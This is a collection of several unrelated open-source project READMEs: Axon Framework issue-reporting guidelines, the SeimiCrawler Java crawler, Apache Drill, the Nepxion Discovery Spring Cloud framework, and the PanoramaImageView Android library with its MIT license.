issue reporting We use GitHub's [issue tracking system](https://github.com/AxonFramework/AxonFramework/issues)) for new feature requests, framework enhancements, and bugs. Before filing an issue, please verify that it's not already reported by someone else. Furthermore, make sure you are adding the issue to the correct repository! When filing bugs: * A description of your setup and what's happening helps us figure out what the issue might be. * Do not forget to provide the versions of the Axon products you're using, as well as the language and version. * If possible, share a stack trace. Please use Markdown semantics by starting and ending the trace with three backticks (```). When filing a feature or enhancement: * Please provide a description of the feature or enhancement at hand. Adding why you think this would be beneficial is also a great help to us. * (Pseudo-)Code snippets showing what it might look like will help us understand your suggestion better. Similarly as with bugs, please use Markdown semantics for code snippets, starting and ending with three backticks (```). * If you have any thoughts on where to plug this into the framework, that would be very helpful too. * Lastly, we value contributions to the framework highly. So please provide a Pull Request as well!
一个简单、敏捷、分布式的支持SpringBoot的Java爬虫框架;An agile, distributed crawler framework.
SeimiCrawler ============ [![GitHub release](https://img.shields.io/github/release/zhegexiaohuozi/SeimiCrawler.svg)](https://github.com/zhegexiaohuozi/JsoupXpath/releases) [![Maven](https://maven-badges.herokuapp.com/maven-central/cn.wanghaomiao/SeimiCrawler/badge.svg)](http://search.maven.org/#search%7Cgav%7C1%7Cg%3A%22cn.wanghaomiao%22%20AND%20a%3A%22SeimiCrawler%22) [![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0) An agile,powerful,standalone,distributed crawler framework.Support spring boot and redisson. SeimiCrawler的目标是成为Java里最实用的爬虫框架,大家一起加油。 # 简介 # SeimiCrawler是一个敏捷的,独立部署的,支持分布式的Java爬虫框架,希望能在最大程度上降低新手开发一个可用性高且性能不差的爬虫系统的门槛,以及提升开发爬虫系统的开发效率。在SeimiCrawler的世界里,绝大多数人只需关心去写抓取的业务逻辑就够了,其余的Seimi帮你搞定。设计思想上SeimiCrawler受Python的爬虫框架Scrapy启发,同时融合了Java语言本身特点与Spring的特性,并希望在国内更方便且普遍的使用更有效率的XPath解析HTML,所以SeimiCrawler默认的HTML解析器是[JsoupXpath](http://jsoupxpath.wanghaomiao.cn)(独立扩展项目,非jsoup自带),默认解析提取HTML数据工作均使用XPath来完成(当然,数据处理亦可以自行选择其他解析器)。并结合[SeimiAgent](https://github.com/zhegexiaohuozi/SeimiAgent)彻底完美解决复杂动态页面渲染抓取问题。 # 最新进展、资讯订阅 # - 微信订阅号 ![weixin](http://img.wanghaomiao.cn/seimiweixin_v2.jpeg) 里面会发布一些使用案例等文章,以及seimi体系相关项目的最新更新动态,后端技术,研发感悟等等。 # V2.0版本新特性 # - 完美支持SpringBoot,[demo参考](https://github.com/zhegexiaohuozi/SeimiCrawler/tree/master/spring-boot-example) - 回调函数支持方法引用,设置起来更自然 ``` push(Request.build(s.toString(),Basic::getTitle)); ``` - 非SpringBoot模式全局配置项通过`SeimiConfig`进行配置,包括 Redis集群信息,SeimiAgent信息等,SpringBoot模式则通过SpringBoot标准模式配置 ``` SeimiConfig config = new SeimiConfig(); config.setSeimiAgentHost(""); //config.redisSingleServer().setAddress("redis://"); Seimi s = new Seimi(config); s.goRun("basic"); ``` SpringBoot模式,在application.properties中配置 ``` seimi.crawler.enabled=true # 指定要发起start请求的crawler的name seimi.crawler.names=basic,test seimi.crawler.seimi-agent-host=xx seimi.crawler.seimi-agent-port=xx #开启分布式队列 seimi.crawler.enable-redisson-queue=true #自定义bloomFilter预期插入次数,不设置用默认值 () #seimi.crawler.bloom-filter-expected-insertions= #自定义bloomFilter预期的错误率,0.001为1000个允许有一个判断错误的。不设置用默认值(0.001) #seimi.crawler.bloom-filter-false-probability= ``` - 分布式队列改用Redisson实现,底层依旧为redis,去重引入BloomFilter以提高空间利用率,一个线上的[BloomFilter调参模拟器地址](https://hur.st/bloomfilter/?n=4000&p=1.0E-7&m=&k=8) - JDK要求 1.8+ # 原理示例 # ## 基本原理 ## ![SeimiCrawler原理图](http://img.wanghaomiao.cn/v2_Seimi.png) ## 集群原理 ## ![SeimiCrawler集群原理图](http://img.wanghaomiao.cn/v1_distributed.png) # 社区沟通讨论 # - QQ群:`557410934` ![QQ群](http://img.wanghaomiao.cn/seimiqq.png) 这个就是给大家自由沟通啦 # 快速开始 # 添加maven依赖(以中央maven库最新版本为准,下仅供参考): ``` <dependency> <groupId>cn.wanghaomiao</groupId> <artifactId>SeimiCrawler</artifactId> <version>2.1.4</version> </dependency> ``` 在包`crawlers`下添加爬虫规则,例如: ``` @Crawler(name = "basic") public class Basic extends BaseSeimiCrawler { @Override public String[] startUrls() { return new String[]{"http://www.cnblogs.com/"}; } @Override public void start(Response response) { JXDocument doc = response.document(); try { List<Object> urls = doc.sel("//a[@class='titlelnk']/@href"); logger.info("{}", urls.size()); for (Object s:urls){ push(Request.build(s.toString(),Basic::getTitle)); } } catch (Exception e) { e.printStackTrace(); } } public void getTitle(Response response){ JXDocument doc = response.document(); try { logger.info("url:{} {}", response.getUrl(), doc.sel("//h1[@class='postTitle']/a/text()|//a[@id='cb_post_title_url']/text()")); //do something } catch (Exception e) { e.printStackTrace(); } } } ``` 然后随便某个包下添加启动Main函数,启动SeimiCrawler: ``` public class Boot { public static void main(String[] args){ Seimi s = new Seimi(); s.start("basic"); } } ``` 以上便是一个最简单的爬虫系统开发流程。 ## 工程化打包部署 ## ### Spring boot(推荐) ### 推荐使用spring boot方式来构建项目,这样能借助现有的spring boot生态扩展出很多意想不到的玩法。Spring boot项目打包参考spring boot官网的标准打包方式即可 ``` mvn package ``` ### 独立运行 ### 上面可以方便的用来开发或是调试,当然也可以成为生产环境下一种启动方式。但是,为了便于工程化部署与分发,SeimiCrawler提供了专门的打包插件用来对SeimiCrawler工程进行打包,打好的包可以直接分发部署运行了。 pom中添加添加plugin ``` <plugin> <groupId>cn.wanghaomiao</groupId> <artifactId>maven-seimicrawler-plugin</artifactId> <version>1.2.0</version> <executions> <execution> <phase>package</phase> <goals> <goal>build</goal> </goals> </execution> </executions> <!--<configuration>--> <!-- 默认target目录 --> <!--<outputDirectory>/some/path</outputDirectory>--> <!--</configuration>--> </plugin> ``` 执行`mvn clean package`即可,打好包目录结构如下: ``` . ├── bin # 相应的脚本中也有具体启动参数说明介绍,在此不再敖述 │ ├── run.bat #windows下启动脚本 │ └── run.sh #Linux下启动脚本 └── seimi ├── classes #Crawler工程业务类及相关配置文件目录 └── lib #工程依赖包目录 ``` 接下来就可以直接用来分发与部署了。 > 详细请继续参阅[maven-seimicrawler-plugin](https://github.com/zhegexiaohuozi/maven-seimicrawler-plugin) # 更多文档 # 目前可以参考demo工程中的样例,基本包含了主要的特性用法。更为细致的文档移步[SeimiCrawler主页](http://seimi.wanghaomiao.cn)中进一步查看 # Change log # 请参阅 [ChangeLog.md](https://github.com/zhegexiaohuozi/SeimiCrawler/blob/master/ChangeLog.md) # 项目源码 # [Github](https://github.com/zhegexiaohuozi/SeimiCrawler) > **BTW:** > 如果您觉着这个项目不错,到github上`star`一下,我是不介意的 ^_^
Apache Drill is a distributed MPP query layer for self describing data
big-data drill hadoop hive java jdbc parquet sql
# Apache Drill [![Build Status](https://github.com/apache/drill/workflows/Github%20CI/badge.svg)](https://github.com/apache/drill/actions) [![Artifact](https://img.shields.io/maven-central/v/org.apache.drill/distribution.svg)](https://search.maven.org/#search%7Cgav%7C1%7Cg%3A%22org.apache.drill%22%20AND%20a%3A%22distribution%22) [![License](https://img.shields.io/badge/license-Apache--2.0-blue.svg)](http://www.apache.org/licenses/LICENSE-2.0) [![Stack Overflow](https://img.shields.io/:stack%20overflow-apache--drill-brightgreen.svg)](http://stackoverflow.com/questions/tagged/apache-drill) [![Join Drill Slack](https://img.shields.io/badge/slack-open-e01563.svg)](http://apache-drill.slack.com "Join our Slack community") Apache Drill is a distributed MPP query layer that supports SQL and alternative query languages against NoSQL and Hadoop data storage systems. It was inspired in part by [Google's Dremel](http://research.google.com/pubs/pub36632.html). ## Developers Please read [Environment.md](docs/dev/Environment.md) for setting up and running Apache Drill. For complete developer documentation see [DevDocs.md](docs/dev/DevDocs.md). ## More Information Please see the [Apache Drill Website](http://drill.apache.org/) or the [Apache Drill Documentation](http://drill.apache.org/docs/) for more information including: * Remote Execution Installation Instructions * [Running Drill on Docker instructions](https://drill.apache.org/docs/running-drill-on-docker/) * Information about how to submit logical and distributed physical plans * More example queries and sample data * Find out ways to be involved or discuss Drill ## Join the community! Apache Drill is an Apache Foundation project and is seeking all types of users and contributions. Please say hello on the [Apache Drill mailing list](http://drill.apache.org/mailinglists/).You can also join our [Google Hangouts](http://drill.apache.org/community-resources/) or [join](https://bit.ly/2VM0XS8) our [Slack Channel](https://join.slack.com/t/apache-drill/shared_invite/enQtNTQ4MjM1MDA3MzQ2LTJlYmUxMTRkMmUwYmQ2NTllYmFmMjU4MDk0NjYwZjBmYjg0MDZmOTE2ZDg0ZjBlYmI3Yjc4Y2I2NTQyNGVlZTc) if you need help with using or developing Apache Drill (more information can be found on [Apache Drill website](http://drill.apache.org/)). ## Export Control This distribution includes cryptographic software. The country in which you currently reside may have restrictions on the import, possession, use, and/or re-export to another country, of encryption software. BEFORE using any encryption software, please check your country's laws, regulations and policies concerning the import, possession, or use, and re-export of encryption software, to see if this is permitted. See <http://www.wassenaar.org/> for more information. The U.S. Government Department of Commerce, Bureau of Industry and Security (BIS), has classified this software as Export Commodity Control Number (ECCN) 5D002.C.1, which includes information security software using or performing cryptographic functions with asymmetric algorithms. The form and manner of this Apache Software Foundation distribution makes it eligible for export under the License Exception ENC Technology Software Unrestricted (TSU) exception (see the BIS Export Administration Regulations, Section 740.13) for both object code and source code. The following provides more details on the included cryptographic software: Java SE Security packages are used to provide support for authentication, authorization and secure sockets communication. The Jetty Web Server is used to provide communication via HTTPS. The Cyrus SASL libraries, Kerberos Libraries and OpenSSL Libraries are used to provide SASL based authentication and SSL communication.
☀️ Nepxion Discovery is a solution for Spring Cloud with blue green, gray, route, limitation, circuit breaker, degrade, isolation, tracing, dye, failover, active 蓝绿灰度发布、路由、限流、熔断、降级、隔离、追踪、流量染色、故障转移、多活
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阿里巴巴官方书籍《Nacos架构与原理》作者之一 - Spring Cloud Alibaba Steering Committer、Nacos Group Member - Spring Cloud Alibaba、Nacos、Sentinel、OpenTracing Committer & Contributor <img src="http://nepxion.gitee.io/discovery/docs/discovery-doc/CertificateGVP.jpg" width="43%"><img src="http://nepxion.gitee.io/discovery/docs/discovery-doc/AwardNacos1.jpg" width="28%"><img src="http://nepxion.gitee.io/discovery/docs/discovery-doc/AwardSCA1.jpg" width="28%"> ### 商业合作 ① Discovery系列 | 框架名称 | 框架版本 | 支持Spring Cloud版本 | 使用许可 | | --- | --- | --- | --- | | Discovery | 1.x.x ~ 6.x.x | Camden ~ Hoxton | 开源,永久免费 | | DiscoveryX | 7.x.x ~ 10.x.x | 2020 ~ 2023 | 闭源,商业许可 | ② Polaris系列 Polaris为Discovery高级定制版,特色功能 - 基于Nepxion Discovery集成定制 - 多云、多活、多机房流量调配 - 跨云动态域名、跨环境适配 - DCN、DSU、SET单元化部署 - 组件灵活装配、配置对外屏蔽 - 极简低代码PaaS平台 | 框架名称 | 框架版本 | 支持Discovery版本 | 支持Spring Cloud版本 | 使用许可 | | --- | --- | --- | --- | --- | | Polaris | 1.x.x | 6.x.x | Finchley ~ Hoxton | 闭源,商业许可 | | Polaris | 2.x.x | 7.x.x ~ 10.x.x | 2020 ~ 2023 | 闭源,商业许可 | 有商业版需求的企业和用户,请添加微信1394997,联系作者,洽谈合作事宜 ### 入门资料 ![](http://nepxion.gitee.io/discovery/docs/discovery-doc/Logo64.png) Discovery【探索】企业级云原生微服务开源解决方案 ① 快速入门 - [快速入门Github版](https://github.com/Nepxion/Discovery/wiki) - [快速入门Gitee版](https://gitee.com/Nepxion/Discovery/wikis/pages) ② 解决方案 - [解决方案WIKI版](http://nepxion.com/discovery) - [解决方案PPT版](http://nepxion.gitee.io/discovery/docs/link-doc/discovery-ppt.html) ③ 最佳实践 - [最佳实践PPT版](http://nepxion.gitee.io/discovery/docs/link-doc/discovery-ppt-1.html) ④ 平台界面 - [平台界面WIKI版](http://nepxion.com/discovery-platform) ⑤ 框架源码 - [框架源码Github版](https://github.com/Nepxion/Discovery) - [框架源码Gitee版](https://gitee.com/Nepxion/Discovery) ⑥ 指南示例源码 - [指南示例源码Github版](https://github.com/Nepxion/DiscoveryGuide) - [指南示例源码Gitee版](https://gitee.com/Nepxion/DiscoveryGuide) ⑦ 指南示例说明 - Spring Cloud Finchley ~ Hoxton版本 - [极简版指南示例](https://github.com/Nepxion/DiscoveryGuide/tree/6.x.x-simple),分支为6.x.x-simple - [极简版域网关部署指南示例](https://github.com/Nepxion/DiscoveryGuide/tree/6.x.x-simple-domain-gateway),分支为6.x.x-simple-domain-gateway - [极简版非域网关部署指南示例](https://github.com/Nepxion/DiscoveryGuide/tree/6.x.x-simple-non-domain-gateway),分支为6.x.x-simple-non-domain-gateway - [集成版指南示例](https://github.com/Nepxion/DiscoveryGuide/tree/6.x.x),分支为6.x.x - [高级版指南示例](https://github.com/Nepxion/DiscoveryGuide/tree/6.x.x-complex),分支为6.x.x-complex - Spring Cloud 202x版本 - [极简版指南示例](https://github.com/Nepxion/DiscoveryGuide/tree/master-simple),分支为master-simple - [极简版本地化指南示例](https://github.com/Nepxion/DiscoveryGuide/tree/master-simple-native),分支为master-simple-native - [集成版指南示例](https://github.com/Nepxion/DiscoveryGuide/tree/master),分支为master ![](http://nepxion.gitee.io/discovery/docs/polaris-doc/Logo64.png) Polaris【北极星】企业级云原生微服务商业解决方案 ① 解决方案 - [解决方案WIKI版](http://nepxion.com/polaris) ② 框架源码 - [框架源码Github版](https://github.com/polaris-paas/polaris-sdk) - [框架源码Gitee版](https://gitee.com/polaris-paas/polaris-sdk) ③ 指南示例源码 - [指南示例源码Github版](https://github.com/polaris-paas/polaris-guide) - [指南示例源码Gitee版](https://gitee.com/polaris-paas/polaris-guide) ④ 指南示例说明 - Spring Cloud Finchley ~ Hoxton版本 - [指南示例](https://github.com/polaris-paas/polaris-guide/tree/1.x.x),分支为1.x.x - Spring Cloud 202x版本 - [指南示例](https://github.com/polaris-paas/polaris-guide/tree/master),分支为master ### 功能概述 Discovery【探索】微服务框架,基于Spring Cloud & Spring Cloud Alibaba,Discovery服务注册发现、Ribbon & Spring Cloud LoadBalancer负载均衡、Feign & RestTemplate & WebClient调用、Spring Cloud Gateway & Zuul过滤等组件全方位增强的企业级微服务开源解决方案,更贴近企业级需求,更具有企业级的插件引入、开箱即用特征 ① 微服务框架支持的技术栈,如下 - 支持阿里巴巴Spring Cloud Alibaba中间件生态圈 - 支持阿里巴巴Nacos、Eureka、Consul和Zookeeper四个服务注册发现中心 - 支持阿里巴巴Nacos、携程Apollo、Redis、Zookeeper、Consul和Etcd六个远程配置中心 - 支持阿里巴巴Sentinel、Hystrix和Resilience4J三个熔断限流降级权限中间件 - 支持OpenTracing和OpenTelemetry规范下的调用链中间件,Jaeger、SkyWalking和Zipkin等 - 支持Prometheus Micrometer和Spring Boot Admin两个指标中间件 - 支持Java Agent解决异步跨线程ThreadLocal上下文传递 - 支持Spring Spel解决蓝绿灰度参数的驱动逻辑 - 支持Spring Matcher解决元数据匹配的通配逻辑 - 支持Spring Cloud Gateway、Zuul网关和微服务三大模块的蓝绿灰度发布等一系列功能 - 支持和兼容Spring Cloud Edgware版、Finchley版、Greenwich版、Hoxton版和202x版以及更高的Spring Cloud版本 - 支持和兼容Java8~Java17以及更高的SDK版本 ![](http://nepxion.gitee.io/discovery/docs/discovery-doc/Diagram.jpg) ② Discovery【探索】微服务框架支持的应用功能,如下 - 全链路蓝绿灰度发布 - 全链路版本、区域、 IP地址和端口匹配蓝绿发布 - 全链路版本、区域、 IP地址和端口权重灰度发布 - 全链路蓝 | 绿 | 兜底、蓝 | 兜底的蓝绿路由类型 - 全链路稳定、灰度的灰度路由类型 - 全链路网关、服务端到端混合蓝绿灰度发布 - 全链路单网关、域网关、非域网关部署 - 全链路条件驱动、非条件驱动 - 全链路前端触发后端蓝绿灰度发布 - 全局订阅式蓝绿灰度发布 - 全链路自定义网关、服务的过滤器、负载均衡策略类触发蓝绿灰度发布 - 全链路Header、Parameter、Cookie、域名、RPC Method等参数化规则策略驱动 - 全链路本地和远程、局部和全局无参数化规则策略驱动 - 全链路条件表达式、通配表达式支持 - 全链路内置Header,支持定时Job的服务调用蓝绿灰度发布 - 全链路手工编排、智能编排、无编排蓝绿灰度发布 - 全链路自动化测试 - 全链路自动化模拟流程测试 - 全链路自动化模拟流程本地测试 - 全链路自动化模拟流程云上测试 - 全链路自动化流量侦测测试 - 全链路自动化流量侦测本地测试 - 全链路自动化流量侦测云上测试 - 全链路流量管控对接DevOps运维平台 - 全链路多活单元化 - 全链路隔离路由 - 全链路组隔离路由 - 组负载均衡的消费端隔离 - 组Header传值的提供端隔离 - 全链路版本偏好路由 - 全链路区域调试路由 - 全链路环境隔离路由 - 全链路可用区亲和性隔离路由 - 全链路IP地址和端口隔离路由 - 全链路隔离准入 - 基于IP地址黑白名单注册准入 - 基于最大注册数限制注册准入 - 基于IP地址黑白名单发现准入 - 自定义注册发现准入 - 全链路故障转移 - 全链路版本故障转移 - 全链路区域故障转移 - 全链路环境故障转移 - 全链路可用区故障转移 - 全链路IP地址和端口故障转移 - 全链路服务无损下线,实时性的流量绝对无损 - 全局唯一ID屏蔽 - IP地址和端口屏蔽 - 异步场景下全链路蓝绿灰度发布 - 异步跨线程Agent插件 - Hystrix线程池隔离插件 - 网关动态路由 - 路由动态添加 - 路由动态修改 - 路由动态删除 - 路由动态批量更新 - 路由查询 - 路由动态变更后的事件通知 - 全链路服务限流熔断降级权限 - Sentinel基于服务名的防护 - Sentinel基于组的防护 - Sentinel基于版本的防护 - Sentinel基于区域的防护 - Sentinel基于环境的防护 - Sentinel基于可用区的防护 - Sentinel基于IP地址和端口的防护 - Sentinel自定义Header、Parameter、Cookie的防护 - Sentinel自定义业务参数的防护 - Sentinel自定义组合式的防护 - 全链路监控 - 蓝绿灰度埋点和熔断埋点的调用链监控 - 蓝绿灰度埋点和熔断埋点的日志监控 - 熔断埋点的指标监控 - 全链路蓝绿灰度发布编排建模和流量侦测 - 全链路蓝绿发布编排建模 - 全链路灰度发布编排建模 - 全链路蓝绿发布流量侦测 - 全链路灰度发布流量侦测 - 全链路蓝绿灰度发布混合流量侦测 - 全链路数据库和消息队列蓝绿发布 - 基于多DataSource的数据库蓝绿发布 - 基于多Queue的消息队列蓝绿发布 - 全链路服务侧注解 - 元数据流量染色 - 基于Git插件的元数据流量染色 - 基于服务名前缀的元数据流量染色 - 基于启动参数的元数据流量染色 - 基于配置文件的元数据流量染色 - 基于系统参数的元数据流量染色 - 基于POM版本号的元数据流量染色 - 扫描目录 - 自动扫描目录 - 手工扫描目录 - 注入扫描目录 - 规则策略推送 - 基于配置中心的规则策略订阅推送 - 基于Swagger和Rest的规则策略推送 - 基于平台端和桌面端的规则策略推送 - 统一配置订阅执行器 ![](http://nepxion.gitee.io/discovery/docs/discovery-doc/Ability.jpg) ③ Discovery【探索】微服务框架支持的功能维度,如下 微服务框架支持组(Group)、版本(Version)、区域(Region)、环境(Env)、可用区(Zone)、IP地址和端口(Address)、全局唯一ID七大经典维度实施流量管控的方式,通过“并集”方式叠加作用在流量控制上。上述七个维度在功能上各有各的侧重点,如下表格主要讲述各自的区别 | 维度 | 概念 | 场景 | 功能侧重点 | 关键头 | --- | --- | --- | --- | --- | | 组 | 服务实例的系统ID<br>系统逻辑分组 | 路由隔离 | ① 组负载均衡隔离<br>- 调用端和提供端的元数据group是否相同<br>② 组Header传值策略隔离<br>- Header(n-d-group)和提供端的元数据group是否相同<br>③ 不支持故障转移 | n-d-group | | 版本 | 服务实例的版本<br>适用于生产环境 | 蓝绿灰度发布<br>路由转移<br>故障转移 | ① 版本条件匹配蓝绿发布<br>② 版本权重灰度发布<br>③ 版本偏好<br>- 非蓝绿灰度发布场景下,路由到相应版本的实例<br>- 稳定版本策略、指定版本策略<br>④ 版本故障转移<br>- 未找到相应版本的服务实例,路由到其它版本<br>- 负载均衡策略、稳定版本策略、指定版本策略 | n-d-version<br>n-d-version-weight<br>n-d-version-prefer<br>n-d-version-failover | | 区域 | 服务实例的区域<br>适用于多活单元化<br>适用于多机房<br>适用于多环境 | 蓝绿灰度发布<br>同城双活/异地多活<br>路由转移<br>故障转移 | ① 区域条件匹配蓝绿发布<br>② 区域权重灰度发布<br>③ 区域多活单元化<br>④ 区域调试路由<br>- 多区域路由隔离下跨区服务调用的调试手段<br>⑤ 区域故障转移<br>- 未找到相应区域的服务实例,路由到其它区域<br>- 负载均衡策略、指定区域策略 | n-d-region<br>n-d-region-weight<br>n-d-region-transfer<br>n-d-region-failover | | 环境 | 服务实例的环境<br>适用于测试环境 | 路由隔离<br>故障转移 | ① 环境隔离路由<br>- Header(n-d-env)和提供端的元数据env是否相同<br>② 环境故障转移<br>- 未找到相应环境的服务实例,路由到其它环境<br>- 指定环境(未配置,默认为common)策略 | n-d-env<br>n-d-env-failover | | 可用区 | 服务实例的可用区<br>适用于多机房 | 路由隔离<br>故障转移 | ① 可用区亲和性隔离路由<br>- 调用端和提供端的元数据zone是否相同<br>② 可用区故障转移<br>- 未找到相应可用区的服务实例,路由到其它可用区<br>- 支持负载均衡策略、指定区可用区策略 | n-d-zone-failover | | IP地址和端口 |服务实例机器地址 | 蓝绿灰度发布<br>路由隔离<br>故障转移<br>无损下线 | ① IP地址和端口匹配蓝绿发布<br>② IP地址和端口权重灰度发布<br>③ IP地址和端口故障转移<br>- 未找到相应IP地址和端口的服务实例,路由到其它地址<br>- 负载均衡策略、指定区IP地址和端口策略<br>④ IP地址和端口无损下线黑名单屏蔽 | n-d-address<br>n-d-address-failover<br>n-d-address-blacklist | | 全局唯一ID | 服务实例机器ID | 无损下线 | ① 全局唯一ID无损下线黑名单屏蔽 | n-d-id-blacklist | ![](http://nepxion.gitee.io/discovery/docs/discovery-doc/Filter.jpg) ### 发展历程 - 2017年12月开始筹划 - 2018年03月开始编码 - 2018年06月在GitHub开源 - 2018年06月发布v1.0.0,支持Camden版 - 2018年06月发布v2.0.0,支持Dalston版 - 2018年07月发布v3.0.0,支持Edgware版 - 2018年07月发布v4.0.0,支持Finchley版 - 2019年04月发布v5.0.0,支持Greenwich版 - 2020年04月发布v6.0.0,支持Hoxton版 - 2021年04月完成v7.0.0,支持2020版 - 2022年04月完成v8.0.0,支持2021版 - 2023年01月完成v9.0.0,支持2022版 - 2024年03月完成v10.0.0,支持2023版 ### 版本列表 ① 微服务框架版本兼容列表,如下 ![](http://nepxion.gitee.io/discovery/docs/icon-doc/tip.png) 提醒:版本号右边, `↑` 表示>=该版本号, `↓` 表示<=该版本号 | 框架版本 | 框架分支 | 框架状态 | Spring Cloud版本 | Spring Boot版本 | Spring Cloud Alibaba版本 | | --- | --- | --- | --- | --- | --- | | 10.0.0<br>商业版 | DiscoveryX/master | ![](http://nepxion.gitee.io/discovery/docs/icon-doc/confirm_24.png) | 2023.x.x | 3.2.x | 2023.x.x.x | | 9.0.0<br>商业版 | DiscoveryX/9.x.x | ![](http://nepxion.gitee.io/discovery/docs/icon-doc/confirm_24.png) | 2022.x.x | 3.1.x<br>3.0.x | 2022.x.x.x | | 8.0.0<br>商业版 | DiscoveryX/8.x.x | ![](http://nepxion.gitee.io/discovery/docs/icon-doc/confirm_24.png) | 2021.x.x | 2.7.x<br>2.6.x | 2021.x.x.x | | 7.0.0<br>商业版 | DiscoveryX/7.x.x | ![](http://nepxion.gitee.io/discovery/docs/icon-doc/confirm_24.png) | 2020.x.x | 2.5.x<br>2.4.1 `↑` | 2021.x | | 6.21.0 | Discovery/6.x.x | ![](http://nepxion.gitee.io/discovery/docs/icon-doc/confirm_24.png) | Hoxton.SR5 `↑`<br>Hoxton<br>Greenwich<br>Finchley | 2.3.x.RELEASE<br>2.2.x.RELEASE<br>2.1.x.RELEASE<br>2.0.x.RELEASE | 2.2.7.RELEASE `↑` | | 6.12.11 `↓` | Discovery/6.x.x | ![](http://nepxion.gitee.io/discovery/docs/icon-doc/confirm_24.png) | Hoxton.SR5 `↑`<br>Hoxton<br>Greenwich<br>Finchley | 2.3.x.RELEASE<br>2.2.x.RELEASE<br>2.1.x.RELEASE<br>2.0.x.RELEASE | 2.2.6.RELEASE `↓`<br>2.1.x.RELEASE<br>2.0.x.RELEASE | | ~~5.6.0~~ | ~~Discovery/5.x.x~~ | ![](http://nepxion.gitee.io/discovery/docs/icon-doc/delete_24.png) | Greenwich | 2.1.x.RELEASE | 2.1.x.RELEASE | | ~~4.15.0~~ | ~~Discovery/4.x.x~~ | ![](http://nepxion.gitee.io/discovery/docs/icon-doc/delete_24.png) | Finchley | 2.0.x.RELEASE | 2.0.x.RELEASE | | 3.38.0 | Discovery/3.x.x | ![](http://nepxion.gitee.io/discovery/docs/icon-doc/arrow_up_24.png) | Edgware | 1.5.x.RELEASE | 1.5.x.RELEASE | | ~~2.0.x~~ | ~~Discovery/2.x.x~~ | ![](http://nepxion.gitee.io/discovery/docs/icon-doc/delete_24.png) | Dalston | 1.x.x.RELEASE | 1.5.x.RELEASE | | ~~1.0.x~~ | ~~Discovery/1.x.x~~ | ![](http://nepxion.gitee.io/discovery/docs/icon-doc/delete_24.png) | Camden | 1.x.x.RELEASE | 1.5.x.RELEASE | ![](http://nepxion.gitee.io/discovery/docs/icon-doc/confirm_24.png) 表示维护中 | ![](http://nepxion.gitee.io/discovery/docs/icon-doc/arrow_up_24.png) 表示不维护,但可用,强烈建议升级 | ![](http://nepxion.gitee.io/discovery/docs/icon-doc/delete_24.png) 表示不维护,不可用,已废弃 - 10.x.x版本(适用于2023.x.x)将继续维护 - 9.x.x版本(适用于2022.x.x)将继续维护 - 8.x.x版本(适用于2021.x.x)将继续维护 - 7.x.x版本(适用于2020.x.x)将继续维护 - 6.x.x版本(同时适用于Finchley、Greenwich和Hoxton)将继续维护 - 5.x.x版本(适用于Greenwich)已废弃 - 4.x.x版本(适用于Finchley)已废弃 - 3.x.x版本(适用于Edgware)不维护,但可用,强烈建议升级 - 2.x.x版本(适用于Dalston)已废弃 - 1.x.x版本(适用于Camden)已废弃 ② 相关中间件版本列表,如下 | 组件类型 | 组件版本 | | --- | --- | | 基础组件 | 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An imageView can auto scroll with device rotating.
# PanoramaImageView An imageView can auto scroll with device rotating. ## ScreenShots <img src="screenshots/recyclerview_sample.gif" width="270"> <img src="screenshots/horizontal_sample.gif" width="270"> <img src="screenshots/vertical_sample.gif" width="270"> ## Include PanoramaImageView to Your Project With gradle: ```groovy dependencies { compile 'com.gjiazhe:PanoramaImageView:1.0' } ``` ## Use PanoramaImageView in Layout File Just Like ImageView ```xml <com.gjiazhe.panoramaimageview.PanoramaImageView android:id="@+id/panorama_image_view" android:layout_width="match_parent" android:layout_height="match_parent" android:src="@drawable/img" app:piv_enablePanoramaMode="true" app:piv_show_scrollbar="true" app:piv_invertScrollDirection="false" /> ``` ## Description of Attributes | Attributes | Format | Default | Description | | :-----------------------: | :-----: | :-----: | :---------------------------------: | | piv_enablePanoramaMode | boolean | true | Enable panorama effect or not. | | piv_show_scrollbar | boolean | true | Show scrollbar or not. | | piv_invertScrollDirection | boolean | false | Invert the scroll direction or not. | All the attributes can also be set in java code: ```java panoramaImageView.setEnablePanoramaMode(true); panoramaImageView.setEnableScrollbar(true); panoramaImageView.setInvertScrollDirection(false); ``` ## Register the GyroscopeObserver In Activity or Fragment using PanoramaImageView, you should __register the GyroscopeObserver in onResume()__ and __remember to unregister it in onPause()__. ```java public class MyActivity extends AppCompatActivity { private GyroscopeObserver gyroscopeObserver; @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main); // Initialize GyroscopeObserver. gyroscopeObserver = new GyroscopeObserver(); // Set the maximum radian the device should rotate to show image's bounds. // It should be set between 0 and π/2. // The default value is π/9. gyroscopeObserver.setMaxRotateRadian(Math.PI/9); PanoramaImageView panoramaImageView = (PanoramaImageView) findViewById(R.id.panorama_image_view); // Set GyroscopeObserver for PanoramaImageView. panoramaImageView.setGyroscopeObserver(gyroscopeObserver); } @Override protected void onResume() { super.onResume(); // Register GyroscopeObserver. gyroscopeObserver.register(this); } @Override protected void onPause() { super.onPause(); // Unregister GyroscopeObserver. gyroscopeObserver.unregister(); } } ``` ## Set OnPanoramaScrollListener to observe scroll state If you want to get callback when the image scrolls, set an OnPanoramaScrollListener for PanoramaImageView. ```java panoramaImageView.setOnPanoramaScrollListener(new PanoramaImageView.OnPanoramaScrollListener() { @Override public void onScrolled(PanoramaImageView view, float offsetProgress) { // Do something here. // The offsetProgress range from -1 to 1, indicating the image scrolls // from left(top) to right(bottom). } }); ``` ## License MIT License Copyright (c) 2016 郭佳哲 Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
